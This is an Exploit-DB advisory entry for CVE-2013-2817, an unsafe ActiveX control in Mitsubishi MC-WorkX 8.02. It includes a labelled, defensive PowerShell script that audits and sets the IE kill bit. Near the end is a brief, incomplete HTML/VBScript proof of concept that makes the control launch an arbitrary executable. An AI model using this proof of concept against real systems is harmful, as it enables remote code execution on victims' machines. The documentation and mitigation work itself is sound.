Mitsubishi MC-WorkX 8.02 - ActiveX Control IcoLaunch File Execution

ID EDB-ID:28284
Type exploitdb
Reporter blake
Modified 2013-09-15T00:00:00


Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution. CVE-2013-2817. Remote exploit for the Windows platform.

<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False
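
The properties above (marked safe for scripting and initialization, no kill bit) are what allow a web page to instantiate the control in Internet Explorer. The following PowerShell audit is an added example, not part of the original advisory or any vendor tooling: it reports the kill-bit state and the control's registration for the CLSID listed above, using the standard IE "ActiveX Compatibility" registry location. The `-SetKillBit` switch name is an assumption of this example and needs an elevated prompt.

```powershell
# Added example: audit (and optionally set) the IE kill bit for the CLSID on this page.
param([switch]$SetKillBit)   # hypothetical switch name; writing needs administrator rights

$Clsid   = '{C28A127E-4A85-11D3-A5FF-00A0249E352D}'   # CLSID from the advisory
$KillBit = 0x400                                       # "Compatibility Flags" bit that blocks loading in IE
$SafeCategories = [ordered]@{
    '{7DD95801-9882-11CF-9FA9-00AA006C4ADC}' = 'Safe for scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C4ADC}' = 'Safe for initialization'
}
# 32-bit controls on 64-bit Windows are governed by the Wow6432Node copy of the key.
$Roots = 'HKLM:\SOFTWARE\Microsoft', 'HKLM:\SOFTWARE\Wow6432Node\Microsoft'

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    $key   = Join-Path $root "Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
    }
    if ($SetKillBit -and -not ($flags -band $KillBit)) {
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        $flags = $flags -bor $KillBit   # preserve any other flags already present
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value $flags -Type DWord
    }
    [pscustomobject]@{ Key = $key; Flags = '0x{0:X8}' -f $flags; KillBitSet = [bool]($flags -band $KillBit) }
}

# Report whether the control is registered and which "safe" categories it claims.
foreach ($view in 'Registry::HKEY_CLASSES_ROOT\CLSID', 'Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID') {
    $clsKey = Join-Path $view $Clsid
    if (-not (Test-Path -LiteralPath $clsKey)) { continue }
    $server = (Get-ItemProperty -LiteralPath (Join-Path $clsKey 'InprocServer32') -ErrorAction SilentlyContinue).'(default)'
    $claims = foreach ($cat in $SafeCategories.Keys) {
        if (Test-Path -LiteralPath (Join-Path $clsKey "Implemented Categories\$cat")) { $SafeCategories[$cat] }
    }
    [pscustomobject]@{ Registration = $clsKey; Server = $server; Claims = ($claims -join ', ') }
}
```

A host where the second loop prints a registration and the first shows `KillBitSet` as `False` matches the exposed configuration described in the advisory.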

<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbitrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>

<script language='vbscript'>
target.FileName = file